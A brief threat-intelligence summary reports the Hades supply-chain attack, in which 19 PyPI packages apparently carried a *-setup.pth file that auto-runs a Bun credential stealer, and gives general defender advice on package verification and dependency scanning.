Hades PyPI Attack: 19 Packages Poisoned to Auto-Run Bun Credential Stealer
Summary
A new supply chain attack dubbed Hades has been discovered in the Python Package Index (PyPI), involving 19 poisoned packages containing malicious wheel artifacts. These packages include a *-setup.pth file designed to automatically execute and deploy a Bun credential stealer.
IFF Assessment
This attack targets the Python ecosystem by poisoning popular packages, aiming to steal user credentials, which is detrimental to defenders.
Defender Context
This incident highlights the ongoing threat of supply chain attacks within the software development ecosystem, particularly targeting popular package repositories like PyPI. Defenders should be vigilant about verifying the integrity of packages they download and use, implementing robust dependency scanning, and monitoring for unusual execution patterns or unauthorized credential access.